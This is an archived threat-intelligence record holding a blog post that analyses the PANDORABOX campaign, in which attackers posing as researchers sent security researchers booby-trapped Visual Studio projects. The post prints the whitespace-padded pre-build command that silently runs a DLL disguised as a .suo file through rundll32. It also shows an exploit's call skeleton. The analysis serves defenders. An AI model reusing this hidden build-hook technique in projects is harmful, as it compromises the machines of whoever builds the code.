{
	"id": "59041a9e-d9fc-4756-8cd5-fe3fca9bda61",
	"created_at": "2026-04-06T01:32:05.943053Z",
	"updated_at": "2026-04-10T03:21:24.400951Z",
	"deleted_at": null,
	"sha1_hash": "9da26c5a4a70dad864eb5b3eb10b1ed54de8a70f",
	"title": "PANDORABOX - North Koreans target security researchers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 109547,
	"plain_text": "PANDORABOX - North Koreans target security researchers\r\nPublished: 2021-01-26 · Archived: 2026-04-06 00:22:44 UTC\r\nIntroduction\r\nToday, Google’s Threat Analysis Group (TAG) published a blogpost explaining that several security researchers have been targeted by (allegedly) North Korea. Since the operation seems to rely on the curiosity of security researchers as the enabler for a successful compromise, we dubbed it PANDORABOX.\r\nNo explanation was given for the attribution, but Costin Raiu posted a screenshot from the Kaspersky Threat Attribution Engine which highlights code sharing with Manuscrypt (Lazarus). Note that this alone isn’t enough for a solid attribution, as code similarity can easily be misleading; maybe Google TAG has more information, since they seemed so sure about who was behind the operation?\r\nThe campaign seems to have been on-going for a while, because the persona James Willy (james0x40) created his GitHub account on 16 April 2020.\r\nTwo attack vectors were identified:\r\n1. The attacker would send a link to their blog, which would trigger a Chrome exploit (possibly CVE-2020-15994) and infect the machine.\r\n2. The attacker would share a malicious Visual Studio project (lpe-poc.zip) over email or Telegram.\r\nVisual Studio Project\r\nWe will focus on the Visual Studio project. The dxgkrnl_poc.vcxproj project contains a pre-build event command which force-loads dxgkrnl_poc.vcxproj.suo.
As you can see, the attackers padded the command with a large amount of whitespace so that it is not obvious when someone glances at the project file (the padding is not preserved in the listing below):\r\n \u003cPreBuildEvent\u003e\r\n \u003cCommand\u003e\r\n powershell -executionpolicy bypass -windowstyle hidden if(([system.environment]::osversion.version.major -eq 10) -and [system.environment]::is64bitoperatingsystem -and (Test-Path $(TargetName).vcxproj.suo)){rundll32 $(TargetName).vcxproj.suo,CMS_dataFinal Bx9yb37GEcJNK6bt 4231}\r\n \u003c/Command\u003e\r\n \u003c/PreBuildEvent\u003e\r\nThe command only runs on 64-bit Windows 10 and only if the .suo file is present next to the project; it then loads the .suo as a DLL through rundll32, calling the export CMS_dataFinal with two arguments. The first parameter (Bx9yb37GEcJNK6bt) is the decryption key for the DLL’s strings; the same key appears in Google TAG’s blogpost, which makes sense if the DLL shared with all the targets is the same. The second parameter, 4231 here, differs from the id in the Google TAG post (4901), so it could be an identifier for the victim. This implies that the Visual Studio project file had to be modified before being sent to each victim. That said, an id in the thousands would suggest a very high number of targeted security researchers; I don’t even know if the global pool of security researchers is that big. Nonetheless, if you have been targeted, don’t hesitate to ping me on Twitter at @msuiche to confirm whether your id is also different.\r\nThe SHA-256 hash of the dxgkrnl_poc.vcxproj.suo DLL is 4C3499F3CC4A4FDC7E67417E055891C78540282DCCC57E37A01167DFE351B244.
More information about this file can be found on the Norfolk blog.\r\nProject 1: D3DKMTPresentMultiPlaneOverlay3\r\nWhat’s the LPE, though? The project’s main() is just a chain of D3DKMT setup calls ending on the present call:\r\nvoid main()\r\n{\r\n    EnumerateAdapters1();\r\n    DxgkCreateDevice();\r\n    DxgkCreateContext();\r\n    DxgkCreatePrimaryAllocation();\r\n    DxgkSetVidPnSourceOwner();\r\n    DxgkSetDisplayMode();\r\n    DxgkPresentMutiPlaneOverlay3();\r\n}\r\nThe LPE appears to target a DirectX graphics kernel (dxgkrnl) vulnerability triggered through the D3DKMTPresentMultiPlaneOverlay3 function, which we were not able to reproduce.\r\nThis is somewhat ironic, because the group also seems to have targeted k0shl, who wrote a blogpost about a D3DKMTPresentMultiPlaneOverlay3 vulnerability (CVE-2018-8165, found by Richard Zhu) a few years ago.\r\nNo additional details on the dxgkrnl!DxgkPresentMultiPlaneOverlay3 vulnerability will be provided, since we cannot tell whether we failed to reproduce the issue because it only triggers on specific configurations or because the vulnerability has already been patched.\r\nProject 2: Direct Composition Vulnerability (CVE-2020-17057)\r\nThere is also a second archive that was shared with the security researchers, containing a working exploit for what seems to be CVE-2020-17057.\r\nConclusion\r\nIf you have a different id as the second parameter in your copy of the archive, don’t hesitate to contact me on Twitter at @msuiche, and likewise if you encountered another archive or project. It would be interesting to connect the dots.\r\n360 Threat Intelligence Team linked the operation to Operation DREAMJOB.\r\nSource: https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.comae.com/posts/pandorabox-north-koreans-target-security-researchers/"
	],
	"report_names": [
		"pandorabox-north-koreans-target-security-researchers"
	],
	"threat_actors": [],
	"ts_created_at": 1775439125,
	"ts_updated_at": 1775791284,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9da26c5a4a70dad864eb5b3eb10b1ed54de8a70f.pdf",
		"text": "https://archive.orkl.eu/9da26c5a4a70dad864eb5b3eb10b1ed54de8a70f.txt",
		"img": "https://archive.orkl.eu/9da26c5a4a70dad864eb5b3eb10b1ed54de8a70f.jpg"
	}
}